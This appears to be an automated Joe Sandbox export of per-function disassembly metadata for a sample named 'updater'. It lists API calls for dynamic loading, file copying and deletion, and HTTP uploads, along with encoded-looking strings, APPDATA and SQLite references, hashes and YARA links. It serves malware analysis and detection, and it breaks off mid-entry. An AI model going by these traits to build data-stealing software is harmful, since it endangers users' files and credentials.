Function 0141FDA7 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

GetSystemTimePreciseAsFileTime, xrefs: 0141FDB7

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID: GetSystemTimePreciseAsFileTime
API String ID: 0-595813830
Opcode ID: 1d8e5a0ffde01adba27a27149a9c663e1099340d28fa22174e63e1e9cfd94077
Instruction ID: 2114c3792fab0696f58ae52f9c103397f74f34311f0b8769a075d173e434377a
Opcode Fuzzy Hash: 1d8e5a0ffde01adba27a27149a9c663e1099340d28fa22174e63e1e9cfd94077
Instruction Fuzzy Hash: C1E0C233AC422973C32422D66C06EAABA4ACB90AF3F540167FE08562349976081683D0

Uniqueness

Uniqueness Score: -1.00%

Function 01420095 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e9bcc707df8b390229348158767f5ae8ff0e3f6b9a17f112719d29a863f4808
Instruction ID: 1c71f8f9a0e80bc64da85cfa4827aa91159f4fe472c61f07d78ed7baf935d177
Opcode Fuzzy Hash: 6e9bcc707df8b390229348158767f5ae8ff0e3f6b9a17f112719d29a863f4808
Instruction Fuzzy Hash: 00E04672912238EBCB14DB89990498AF7ECEB45A00B55009AFA01D3220C6B4DE84C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 013C2C33 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 221
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 013B347A: ___std_fs_get_current_path@8.LIBCPMT ref: 013B34C9

Part of subcall function 013CDD77: _Deallocate.LIBCONCRT ref: 013CDD8C

SetCurrentDirectoryA.KERNEL32(?,?), ref: 013C2C8E
LoadLibraryA.KERNEL32(00000000), ref: 013C2D28
GetProcAddress.KERNEL32(01455BB8), ref: 013C2DC9
GetProcAddress.KERNEL32(014554AC), ref: 013C2ED1
GetProcAddress.KERNEL32(01454FE8), ref: 013C2E52

Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9

GetProcAddress.KERNEL32(00000000), ref: 013C2F36
SetCurrentDirectoryA.KERNEL32(?), ref: 013C2F56

Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB

Strings

K., xrefs: 013C2E69
`}}q, xrefs: 013C2D4D
BAZ., xrefs: 013C2DE7
eKW}, xrefs: 013C2DE0

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: AddressCriticalProcSection$CurrentDirectoryEnterLeave$ConditionDeallocateLibraryLoadVariableWake___std_fs_get_current_path@8
String ID: BAZ.$K.$`}}q$eKW}
API String ID: 618739938-911188691
Opcode ID: 9d2c337945cf2e654e09a7f1538f2fc816a6a47b5f40d7cd1aa9bd4278c68d91
Instruction ID: 81a047134fefd58eb13080632185784e86ba3046365b0bfb9f2b624eb6323898
Opcode Fuzzy Hash: 9d2c337945cf2e654e09a7f1538f2fc816a6a47b5f40d7cd1aa9bd4278c68d91
Instruction Fuzzy Hash: 819116309043469BCB25EFFDD444AAEBBB0BF64714F24412EE550AB2B2DB74A984CF51

Uniqueness

Uniqueness Score: -1.00%

Function 013F6531 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 123
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 013F5C8D: GetModuleHandleW.KERNEL32(00000000,00000000,?,013F6317,01453954,kernel32.dll,GetFileInformationByHandleEx,013F5D5A,00000003,?,00000080,0143439A), ref: 013F5C9D
Part of subcall function 013F5C8D: GetProcAddress.KERNEL32(00000000,0143439A,?,013F6317,01453954,kernel32.dll,GetFileInformationByHandleEx,013F5D5A,00000003,?,00000080,0143439A), ref: 013F5CAB

RemoveDirectoryW.KERNEL32(00000000,01453958,kernel32.dll,SetFileInformationByHandle,013F5D5A,4350CDAC,?,?,?,00000000), ref: 013F657C
GetLastError.KERNEL32(?,?,00000000), ref: 013F6594
DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 013F65A4
GetLastError.KERNEL32(?,?,00000000), ref: 013F65AE
GetLastError.KERNEL32(?,?,00000000), ref: 013F65B8
___std_fs_open_handle@16.LIBCPMT ref: 013F65EB

Strings

SetFileInformationByHandle, xrefs: 013F655F
kernel32.dll, xrefs: 013F6564

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast$AddressDeleteDirectoryFileHandleModuleProcRemove___std_fs_open_handle@16
String ID: SetFileInformationByHandle$kernel32.dll
API String ID: 1377414829-82236170
Opcode ID: f256a772b29918bec7a1da713b68081d81e3de02a4d7452ff53fa9aa4cbc70d7
Instruction ID: a9934e1101a6050820a7dad30999e8bf7e158e036b4b957b14394659c12fc625
Opcode Fuzzy Hash: f256a772b29918bec7a1da713b68081d81e3de02a4d7452ff53fa9aa4cbc70d7
Instruction Fuzzy Hash: 964139F5A04108EBEB219B78CC4ABADBFF9AB44769F14402DFA01F2294DB748900C770

Uniqueness

Uniqueness Score: -1.00%

Function 014244F6 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 0142477E

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 9da24808ffbe7992d9770c8249711059e595f2c0aac7f12997b8198f20ae076e
Instruction ID: 0e7d78a89880144e6bf3804266f0721c41115dc272c90a669554e5e8ff418050
Opcode Fuzzy Hash: 9da24808ffbe7992d9770c8249711059e595f2c0aac7f12997b8198f20ae076e
Instruction Fuzzy Hash: E5C10574A00255AFDF11DF9DD880BBEBBB0FF99310F48405AE555AB3A1D7709982CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0142C47C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0142C135: CreateFileW.KERNEL32(00000000,00000000,?,0142C525,?,?,00000000), ref: 0142C152

GetLastError.KERNEL32 ref: 0142C590
__dosmaperr.LIBCMT ref: 0142C597
GetFileType.KERNEL32 ref: 0142C5A3
GetLastError.KERNEL32 ref: 0142C5AD
__dosmaperr.LIBCMT ref: 0142C5B6
CloseHandle.KERNEL32(00000000), ref: 0142C5D6
CloseHandle.KERNEL32(01420CCF), ref: 0142C723
GetLastError.KERNEL32 ref: 0142C755
__dosmaperr.LIBCMT ref: 0142C75C

Strings

H, xrefs: 0142C6E1

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: cfca05d0345371a461e08f821080b96da5eb013e53669f96784dad12c16ef8a5
Instruction ID: e19b0c2279e5553b58fd098182a1cfdcc3ff9ed903cd5ba12ad16c88b8ec9274
Opcode Fuzzy Hash: cfca05d0345371a461e08f821080b96da5eb013e53669f96784dad12c16ef8a5
Instruction Fuzzy Hash: 93A14532A001259FCF29DF7CDC91BAE7BB0AB46324F58015EE845AF3A1D7359982CB51

Uniqueness

Uniqueness Score: -1.00%

Function 013BDDC0 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 297
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50

Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9

CopyFileA.KERNEL32 ref: 013BE0F6

Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB

Strings

rYOBBKZJOZ., xrefs: 013BDED2
., xrefs: 013BDFBD
KZ, xrefs: 013BE12D
OZ, xrefs: 013BE134
YOBB, xrefs: 013BE126
., xrefs: 013BE13A
A\Kr, xrefs: 013BE11F
JOZ., xrefs: 013BDEA0

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
String ID: .$.$A\Kr$JOZ.$KZ$OZ$YOBB$rYOBBKZJOZ.
API String ID: 265086031-2949469555
Opcode ID: 3a0db48534a68b81d9821a6d35302cc676a69d29032dfab3257a5d0eb3268b1d
Instruction ID: 815ee9b39a0bc5eca3243bcc3e9027e32f96f8611dcf1b2adfc2b58ed26c8432
Opcode Fuzzy Hash: 3a0db48534a68b81d9821a6d35302cc676a69d29032dfab3257a5d0eb3268b1d
Instruction Fuzzy Hash: 85C10430D04289DFDB25EBE8D884BDDBBB0BF25314F24409ED5457B2A2EB705A89CB51

Uniqueness

Uniqueness Score: -1.00%

Function 013BF68F Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 296
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50

Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9

CopyFileA.KERNEL32 ref: 013BF9CB

Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB

Strings

G\, xrefs: 013BF7EC
JOZ., xrefs: 013BFA02
., xrefs: 013BF892
BKZ, xrefs: 013BF9FB
rYOBBKZJOZ., xrefs: 013BF7A1
rYOB, xrefs: 013BF9F4
JOZ., xrefs: 013BF76F

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
String ID: .$BKZ$G\$JOZ.$JOZ.$rYOB$rYOBBKZJOZ.
API String ID: 265086031-3370317137
Opcode ID: 5f6a6ce40f332a1d1eaf9eb85cd4499f1a1ad838b3b91bf1d5db43c313a7a509
Instruction ID: 38be2c8ef1c14ccfa904dc16f8fcde90acf86b94a2f82d8a86eabff0590456cd
Opcode Fuzzy Hash: 5f6a6ce40f332a1d1eaf9eb85cd4499f1a1ad838b3b91bf1d5db43c313a7a509
Instruction Fuzzy Hash: 81C1E530D0428ADEDB15EFE8C884BEDBBB0BF65704F14409ED5457B1A2EB705A49CB61

Uniqueness

Uniqueness Score: -1.00%

Function 013CC44A Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 295
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(01454FBC,00000000,00000000,00000000,00000000), ref: 013CC4E1
InternetConnectA.WININET(00000000,01452A14,00000050,00000000,00000000,00000003,00000000,00000000), ref: 013CC507
HttpOpenRequestA.WININET(00000000,01454D5C,01454CFC,00000000,00000000,00000000,8468C200,00000000), ref: 013CC605

Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9

Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB

InternetCloseHandle.WININET(~a}z), ref: 013CC7E8
InternetCloseHandle.WININET(?), ref: 013CC7ED
InternetCloseHandle.WININET(?), ref: 013CC7F2

Strings

~a}z, xrefs: 013CC5B4
[^BAOJK\., xrefs: 013CC4A4

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Internet$CriticalSection$CloseHandle$EnterLeaveOpen$ConditionConnectHttpRequestVariableWake
String ID: [^BAOJK\.$~a}z
API String ID: 3302835935-3567702361
Opcode ID: b845f930feb8237ad7e002d7827c6065a050e3e33785bb648000369a585614fe
Instruction ID: 6a856c9d70f0f9fc280b05b2e31724d468838c63f1c5c8c8bb7ea22e1fe11557
Opcode Fuzzy Hash: b845f930feb8237ad7e002d7827c6065a050e3e33785bb648000369a585614fe
Instruction Fuzzy Hash: B2B16571D04349AEDB16DFB9D8489ADFBB0FF25618F28512EE4046B1A2DB705C86CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01423A19 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01423A9B
_free.LIBCMT ref: 01423ABF
_free.LIBCMT ref: 01423C4C
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0143E0E8), ref: 01423C5E
_free.LIBCMT ref: 01423E18

Strings

Pacific Standard Time, xrefs: 01423CCD
Pacific Daylight Time, xrefs: 01423CFC

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: Pacific Daylight Time$Pacific Standard Time
API String ID: 597776487-1154798116
Opcode ID: ae64f72eb244fe26b43e9eeaba83e24aedc28ed164552dc2367ca45d68236eb3
Instruction ID: 8b75c7eb214fecc5f21d9dbf95e212ce62871dfd79f3f74342904ca7882838ea
Opcode Fuzzy Hash: ae64f72eb244fe26b43e9eeaba83e24aedc28ed164552dc2367ca45d68236eb3
Instruction Fuzzy Hash: D7C11931900225AFDB259F6DD840BAA7FF9FF69210F94406FE5859B362E73889C1CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013BD88B Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 324fileCOMMON

Download Yara Rule

APIs

Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50

Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9

CopyFileA.KERNEL32 ref: 013BDB97

Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB

Strings

XKBJ, xrefs: 013BD98C
Lr, xrefs: 013BD993
., xrefs: 013BD999
A\OI, xrefs: 013BD974
APPDATA, xrefs: 013BD9F5
KrBK, xrefs: 013BD985

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
String ID: .$APPDATA$A\OI$KrBK$Lr$XKBJ
API String ID: 265086031-2824349140
Opcode ID: b11d72745dbd576f803c7161077f40e80a326bf64ebd6ea2e34172699c384726
Instruction ID: 90d8fde6a0b57aa30bf0976cd4c2f7482ea4f4c545b05de7d097684355a8f152
Opcode Fuzzy Hash: b11d72745dbd576f803c7161077f40e80a326bf64ebd6ea2e34172699c384726
Instruction Fuzzy Hash: 6BE17C31C0528ADEDF15DBE8C990AEDBBB4AF24308F2441AED50567291EB706F49CF61

Uniqueness

Uniqueness Score: -1.00%

Function 013BE85F Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 294fileCOMMON

Download Yara Rule

APIs

Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50

Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9

CopyFileA.KERNEL32 ref: 013BEB81

Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB

Strings

JOZ., xrefs: 013BE93F
rYOB, xrefs: 013BEBAA
JOZ., xrefs: 013BEBB8
BKZ, xrefs: 013BEBB1
rYOBBKZJOZ., xrefs: 013BE971

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
String ID: BKZ$JOZ.$JOZ.$rYOB$rYOBBKZJOZ.
API String ID: 265086031-1704678390
Opcode ID: 6c909a507827916d7498afddf3a290d20dae687199df9c9ff5219fa664aaf161
Instruction ID: 253188e0d3301e13fa8925df80cf744ce2371b0171098d0c31beed7169222b75
Opcode Fuzzy Hash: 6c909a507827916d7498afddf3a290d20dae687199df9c9ff5219fa664aaf161
Instruction Fuzzy Hash: 29C11630D0428ADEDB15EBE8C484BEDFBB0BF25304F2440AED5557B1A2EB706A49CB51

Uniqueness

Uniqueness Score: -1.00%

Function 013CC2CA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94networkfileCOMMON

Download Yara Rule

APIs

HttpSendRequestExA.WININET(?,?,00000000,00000000,00000000), ref: 013CC368
InternetWriteFile.WININET(?,?,?,?), ref: 013CC37D
InternetWriteFile.WININET(?,?,?,?), ref: 013CC388
InternetWriteFile.WININET(?,?,00000010,?), ref: 013CC395
HttpEndRequestA.WININET(?,00000000,00000000,00000000), ref: 013CC39E

Strings

(, xrefs: 013CC352

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: FileInternetWrite$HttpRequest$Send
String ID: (
API String ID: 2326806561-3887548279
Opcode ID: 9394345eae8669c147780b9adb5eee9bace685b87b21f75c68c124adaae17a74
Instruction ID: bd4d2aceb548809800ab86997ed2e8f40f493ddc792285d1ab10e0e251c66f03
Opcode Fuzzy Hash: 9394345eae8669c147780b9adb5eee9bace685b87b21f75c68c124adaae17a74
Instruction Fuzzy Hash: B2311EB2D04219AFDB14DFA8DC44AEEBFB8FF48704F10842EE516A7251D6359A05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0141F9B8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 0141FA23
api-ms-, xrefs: 0141FA0F

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: f57af94f7f0fb8d86781349066d50c68d7f88cdee96f8a91bab99c581106b504
Instruction ID: a79efd71c3fe202ef71987f393e4476245b9efab0868a9052b24ac5e06f27003
Opcode Fuzzy Hash: f57af94f7f0fb8d86781349066d50c68d7f88cdee96f8a91bab99c581106b504
Instruction Fuzzy Hash: 5821EB73A01315A7DB318A289C40B1B3BA8AF057F0F150116ED15A73B9E634DD0EC6D0

Uniqueness

Uniqueness Score: -1.00%

Function 013D4C21 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 294COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 013D4CC9

Strings

-journal, xrefs: 013D4E64
:memory:, xrefs: 013D4C80
-stmtjrnl, xrefs: 013D4E82

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
